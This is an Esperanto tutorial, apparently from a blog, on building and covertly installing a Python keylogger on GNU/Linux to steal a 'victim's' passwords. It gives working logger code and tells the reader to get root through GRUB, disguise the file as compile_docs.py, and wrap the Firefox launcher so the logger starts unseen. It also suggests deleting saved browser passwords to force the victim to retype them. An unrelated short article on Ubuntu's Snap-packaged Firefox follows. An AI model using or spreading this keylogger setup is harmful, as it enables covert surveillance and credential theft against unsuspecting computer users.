En ĉi tiu artikolo mi montras al vi kiel programi klavaroregistrilon, kiu sendas mesaĝojn per retpoŝto kaj detruiĝas post difinita dato.

Simpla maniero ŝteli pasvortojn estas instali klavaroregistrilon (keylogger) en la komputilo de nia viktimo. Mi montros kiel fari tion en GNU/Linukso per la Python-programlingvo.

Unue ni devas akiri permesojn de ĉefuzanto. Se la komputilo estas administrita de ni, ni jam scias la pasvorton. Se tio ne estas nia okazo, ni povas akiri aliron de ĉefuzanto per GRUB. Per la necesaj permesoj ni jam povas instali la klavaroregistrilon.

Unue, oni devas instali la pynput-bibliotekon per...

sudo pip install pynput

Sekve ni devas skribi la klavaroregistrilon. Jen la kodo, kiun ni uzos:

#!/usr/bin/env python3
from pynput.keyboard import Key, Listener
import logging

log_dir = "/usr/share/doc/python3/"

logging.basicConfig(filename=(log_dir + "log"), \
        level=logging.DEBUG, format='%(asctime)s: %(message)s')

def on_press(key):
    logging.info(str(key))

with Listener(on_press=on_press) as listener:
    listener.join()

La klavaroregistrilo konserviĝas en log_dir. Mi, ĉi-okaze, specifis la dokumentaran dosieron de Python 3 en GNU/Linukso. Ni ankaŭ povas konservi la klavaroregistrilon en tiun dosierujon, eble uzante la nomon compile_docs.py aŭ iun similan, por ne altiri la atenton. Plej bone estas elekti dosierujon, kiun la viktimo ne eniros, por eviti, ke ri ne rimarku tion, kion ni faras.

Fine ni devus plenumi la programon ĉiam, kiam oni ŝaltu la komputilon aŭ programo estu plenumita, sen ke la viktimo rimarku. Se, ekzemple, ni volas startigi la klavaroregistrilon ĉiam, kiam la uzanto malfermu Firefox-on, ni povas modifi la Firefox-komandon. Ni povas alinomi firefox¹ al firefox.bin kaj krei la jenan dosieron nomitan firefox.

python3 /usr/share/doc/python3/compile_docs.py &
exec firefox.bin "$@"

Por scii kiu firefox-dosiero estas plenumita, kiam ni premas ĝian bildeton, ni devas iri al /usr/share/applications, eniri la dosieron firefox.desktop (aŭ firefox-esr.desktop) kaj serĉi la linion, kiu komenciĝas per Exec.

Sekve ni devus doni al ĝi skribpermesojn por aliaj uzantoj malsamaj ol root al la dosierujo, kie ni konservos la klavaroregistrilon:

sudo chmod o+w /usr/share/doc/python3

Finfine ni devus atendi ĝis la viktimo uzu la komputilo por atingi riajn pasvortojn aŭ ĉian ajn informon, kiun ri tajpu, kiun ni volas akiri. La registroj de klavoj estos konservita en la dosiero /usr/share/doc/python3/log. Sed estu singarda: la dosiero povus preni multe da spaco, se vi ne forigas ĝin de tempo al tempo; do plej bone estus malinstali la klavaroregistrilon post la akiro de la informoj, kiujn vi bezonas. Alia opcio estas agordi ĝin, por ke ĝi sendu la informon de tajpado per retpoŝto anstataŭ konservi ĝin en dosieron. Tiel ĝi ne prenus multe da spaco en la viktimula komputilo; sed tiu metodo postulas, ke ni uzu retadreson².

Se la viktimo havas la pasvortojn konservitajn en la retumilo kaj ne bezonas skribi ilin denove, ni povas forigi la dosieron de pasvortoj, por ke ĝi estu devigita enigi ilin denove. Resume, ni povas ruze akiri multe da informo, speciale se ni uzas ĉi tiun metodon kontraŭ amatoraj uzantoj, kiuj ne multe suspektos. Por progresintaj uzantoj eble plej bonas kompili la compile_docs.py-programon per Nuitka, kiel mi montras en la sekva artikolo.

Per sia versio 22.04, kiu estos eldonita la 21an de aprilo, Ubuntu igos, ke programoj uzu Snap-pakojn anstataŭ la .deb-aj. Tiuj pakoj aŭtomate ĝisdatiĝas sen iri tra prova fazo kiel okazas kun la pakoj de Debiano kaj aliaj distribuoj. En la kazo de la pako de Firefox, estas la skipo de Mozilla (ne Ubuntu), kiu decidas kiel kaj kiam la retumilo ĝisdatiĝas.

Firefox estas libera programaro, sed ĝi enhavas proprieterojn kiel Pocket. Mozilla povas per Snap aldoni aliajn similajn erojn kaj malagrablajn funkciojn.

La Snap-oj havas iujn avantaĝojn: ili permesas paki programon kun ĉiuj iliaj dependaĵoj, ili funkcias en ĉiuj distribuoj, ktp. Tamen ili malrapidigas la startigan procezon; ili estas multe pli malrapidaj, kiam ili estas plenumitaj unuafoje; ili okupas pli da spaco, ĉar ili enhavas bibliotekojn, kiuj povus esti uzitaj de pluraj programoj; ilia defaŭlta deponejo («aĉetejo») estas proprieta; ili postulas la uzon de systemd, ktp.

Se la uzo de la Snap-oj estus nedeviga, ne estus tiom da polemiko, sed Ubuntu trudis ilin por kelkaj pakoj, por kiuj ne plu estas .deb-a alternativo.